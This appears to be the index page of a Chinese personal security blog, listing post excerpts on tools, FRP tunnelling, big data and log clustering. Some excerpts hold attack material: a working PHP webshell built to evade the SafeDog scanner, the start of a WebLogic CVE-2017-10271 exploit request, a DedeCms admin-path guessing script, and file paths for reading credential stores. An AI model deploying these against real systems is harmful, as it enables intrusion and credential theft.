个人项目&工具导航

最近经常有人问我要脚本、工具啥的..其实你们仔细找找,就能找到。不过为了照顾小白,在此文章建立导航。 0.Web信息收集工具 地址:http://jeary.org/post-4.html 说明:此工具为初学c#所写,所以有些地方有bug,另外功能方面也体验不好(写这个工具的时候还是未成年呀!!) PS:此工具已放弃维护,别再问我有没有新版了.. 1.社交信息爬取工具 地址:http://jeary.org/post-5.html 说明:有一段时间喜欢从别人的公开社交信息收集...

阅读全文>>

[该文章已设置加密,请点击标题输入密码访问]

Php Webshell ByPass SafeDog

记录一些php webshell代码 最新版安全狗扫描结果: 下面是代码,代码顺序为图中顺序: <?php $arr = array('a','s','s','e','r','t'); $func = ''; for($i=0;$i<count($arr);$i++) { $func .= $func . $arr[$i]; } $func($_REQUEST['c']); ?> <?php    @$_++;  $__=("#...

阅读全文>>

Github下载单个文件或文件夹Tips

最近学习Storm,于是从Github下载https://github.com/alibaba/jstorm 由于环境已经通过其他方式部署完成,所以并不需要完整的项目,只需要下载单个文件或者文件夹,这个时候使用git就比较麻烦了。 另外github听说不支持git clone某个文件或者文件夹,为的是保证project的完整性 ,而使用SVN就没问题了 方法如下:  首先找到项目中需要下载的文件夹,如:https://github.com/alibaba/jstorm/tree/master/example 将tree/...

阅读全文>>

FRP内网穿透笔记

有时需要临时将本地的服务提供到外部进行访问,一般情况下我们的做法有两种 1.路由器设置端口映射将本地服务映射到公网某个端口 2.在公网服务器上搭建相关服务 前者需要路由权限,且路由映射的的数量有上限,而后者需要重新进行搭建环境,如果vps配置较低可能无法搭建所有服务,而使用内网穿透工具仅需要一台低配置的vps即可 1.具有公网IP的vps(推荐vultr\banwagon\阿里云,性价比比较高) 2.FRP工具 登陆服务器并下载对应版本 Github地址 https://github.com/f...

阅读全文>>

大数据技能点

                路漫漫其修远兮,吾将上下而求索             一、大数据通用处理平台         1、Spark      ...

阅读全文>>

Weblogic WLS组件漏洞POC

漏洞编号:CVE-2017-10271 漏洞描述:WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击 受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。 http://0.0.0.0:7071/wls-wsat/CoordinatorPortType <soapenv:Envelope xmlns:soapenv="http://schemas.xmls...

阅读全文>>

DedeCms后台猜解

网上流传的一个找后台的姿势,记录一下: <?php $domain='http://localhost/dedecms/'; $url=$domain.'/index.php'; function post($url, $data, $cookie = '') { $options = array( CURLOPT_RETURNTRANSFER => true, CURLOPT_HEADER => true, CURLOPT_POST => true, CURLOPT_SSL_V...

阅读全文>>

任意文件读取常见利用路径

C:/boot.ini //查看系统版本 C:/WindowsSystem32inetsrvMetaBase.xml //IIS配置文件 C:/Windowsrepairsam //存储系统初次安装的密码 C:/Program Filesmysqlmy.ini //Mysql配置 C:/Program Filesmysqldatamysqluser.MYD //Mysql root C:/Windowsphp.ini //php配置信息 C:/Windowsmy.ini //Mysql配置信息C:Windowswin.ini //Windows系统的一个基本系统配置文件 Li...

阅读全文>>

使用K-means对网站访问者进行聚类

在分析Web日志流程中,寻找可疑请求、寻找异常访问者为分析流程中的基础流程,传统的做法是使用正则进行筛选,而这些正则则是通过我们已知的安全经验编写出来的,此时我们可以通过尝试一些新的方法~ 一、数据准备 同上篇 二、算法测试 依赖库地址:[K-Means Java实现](https://sourceforge.net/p/yuanboshekmeans/code/ref/master/) 我们下载kmeans库之后将其引用到项目中,并编写测试Demo,测试库的可用性。测试Demo如图:  可以看到我们使用了4个3维的样本数据,数据...

阅读全文>>